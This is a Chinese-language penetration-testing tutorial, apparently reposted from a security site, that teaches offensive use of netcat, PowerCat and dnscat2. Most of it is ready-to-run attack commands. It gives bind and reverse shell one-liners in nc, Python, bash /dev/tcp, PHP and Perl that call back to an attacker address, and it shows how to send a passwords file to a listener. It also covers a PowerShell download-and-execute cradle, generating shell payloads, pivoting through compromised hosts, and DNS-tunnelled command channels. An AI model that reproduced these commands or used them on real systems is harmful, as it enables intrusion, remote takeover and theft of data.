原文作者:lryfish
原文地址:https://www.freebuf.com/sectool/321013.html
Banner抓取是一种在开放端口上检索关于特定服务信息的技术,在渗透测试中用于漏洞的评估
执行以下命令,可以得知目标主机端口运行的服务
nc -nv <Your IP> <Port>
nc -nvv <Your IP> <Port>
扫描指定端口
nc -v <Your IP> <Port>
扫描指定端口段(速度较慢)
nc -v -z <Your IP> <Port>-<Port>
监听本地端口,访问时输出到命令行
nc -l -p 9999
在本地服务器生成一个1.txt文件并监听
nc -lp 333 >1.txt
在目标主机与服务器333端口建立连接,传输一个password文件
nc -vn 192.168.200.6 333 < passwords.txt -q 1
本地服务器监听
nc -l -p 9999
目标主机输入
nc -nv 192.168.200.6 9999
控制端主动发起连接去连接被控制端。
目标主机输入命令监听目标主机9999端口
nc -lvp 9999 -e /bin/sh //Lunix
nc -lvp 9999 -e c:\windows\system32\cmd.exe //Windows
输入命令在本地或者服务器上连接目标主机的9999端口
nc 192.168.200.6 9999
被控制端主动连接控制端。
输入命令在本地或者服务器上监听9999端口
nc -lvp 9999
目标主机输入命令连接服务器9999端口
nc 192.168.200.6 9999 -e /bin/sh //Linux
nc 192.168.200.6 9999 -e c:\windows\system32\cmd.exe //Windows
一般情况目标主机中是没有nc的,可以使用其他工具和编程语言代替nc,实现反向连接
在服务器监听本地9999端口
nc -lvp 9999
在目标主机执行如下命令
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.200.6",9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
在服务器监听本地9999端口
nc -lvp 9999
在目标主机执行如下命令
bash -c 'exec bash -i >& /dev/tcp/192.168.200.6/9999 0>&1'
在服务器监听本地9999端口
nc -lvp 9999
PHP常用在Web服务器上,是nc,perl和Bash很好的替代品
php -r '$sock=fsockopen("192.168.200.6",9999);exec("/bin/sh -i <&3 >&3 2>&3");'
在服务器监听本地9999端口
nc -lvp 9999
如果此时目标主机使用的是Perl语言,仍然可以使用Perl来建立反向Shell
在目标主机运行如下命令
perl -e 'use Socket;$i="192.168.200.6";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">$S");open(STDOUT,">$S");open(STDERR,">&S");exec("/bin/sh -i");};'
如图所示,测试环境为:攻击者服务器( Kali Linux);一个小型内网;三台服务器。假设获取了Web服务器的权限,通过 Kali Linux机器不能访问数据库服务器( Linux),但通过web服务器可以访问数据库服务器( Linux)。测试目标为:获取数据库服务器( Linux)的Shell
首先在服务器输入如下命令监听9999端口
nc -lvp 9999
接着在数据库服务器执行如下命令
nc -lvp 9999 -e /bin/sh
最后在Web服务器执行如下命令
nc -v 192.168.1.4 9999 -c "nc -v 1.1.1.200 9999"
PowerCat可以说是nc的PowerShell版本,PowerCat可以通过执行命令回到本地运行,也可以使用远程权限运行powercat(github.com)
导入powercat输入Import-Module .\powercat.ps1
输入“powercat -h”查看命令提示
在Windows server 2008服务器上执行监听命令
powercat -l -p 8080 -e cmd.exe -v
然后在kali上执行
netcat 192.168.200.6 8080 -vv
在kali上监听
nc -l -p 9999 -vv
在Windows server 2008执行,-c参数用于提供想要连接的IP地址
powercat -c 192.168.200.6 -p 9999 -v -e cmd.exe
前面的操作都是可以与nc进行交互。但是,如果想返回PowerShell,则无法与nc进行交互。下面介绍如何让Windows7和Windows server 2008建立正向连接
在Win7执行下载命令
IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.1/powercat.ps1')
再执行监听命令
powercat -l -p 9999 -v
在Win server 2008执行如下命令 -ep用于返回PowerShell
powercat -c 192.168.1.3 -p 9999 -v -ep
在win2008新建一个test.txt文件放在c盘根目录下,在win7执行命令
powercat -l -p 9999 -of test.txt -v
回到win2008中执行命令
powercat -c 192.168.1.3 -p 9999 -i c:\test.txt -v
用PowerCat生成的Payload也有正向和反向之分,且可以对其进行编码
在win2008执行命令生成一个简单的payload
powercat -l -p 8000 -e cmd -v -g >> shell.ps1
将生成的ps1文件上传到win7并执行,然后在win2008上执行如下命令反弹shell
powercat -c 192.168.1.3 -p 8000 -v
如果想要反弹PowerShell,win2008执行命令
powercat -l -p 8000 -ep -v -g >> shell.ps1
将生成的ps1文件上传到win7并执行,然后在win2008上执行如下命令反弹Powershell
powercat -c 192.168.1.3 -p 8000 -v
PowerCat是一套基于DNS通信的协议,基于dnscat设计的
使用dnscat,依次执行
git clone https://github.com/iagox86/dnscat2
cd dnscat2/server/
gem install bundler
bundle install
在安装了dnscat的Linux主机上运行
ruby dnscat2.rb ttpowercat.test -e open --no-cache
返回win2008执行命令
powercat -c 192.168.200.6 -p 53 -dns ttpowercat.test -e cmd.exe
测试环境为:三台主机,其中 Windows Server2008主机可以通过ping命令访问 Windows7主机和 Kali Linux主机, Kali Linux主机和 Windows7主机之间无法通过网络连接。测试目标为:将 Windows Server2008主机作为跳板,让 Kali Linux主机连接Windows7主机。
首先,在 Windows7中执行如下命令。
powercat -l -v -p 9999 -e cmd.exe
Windows Server2008中执行如下命令。
powercat -l -v -p 8000 -r tcp:192.168.1.3:9999
最后,让 Kali Linux主机与 Windows Server2008主机进行连接,Windows Server2008主机就可以将流量转发给Windows7了
nc 192.168.200.24 8000 -vv
好文推荐
欢迎关注 系统安全运维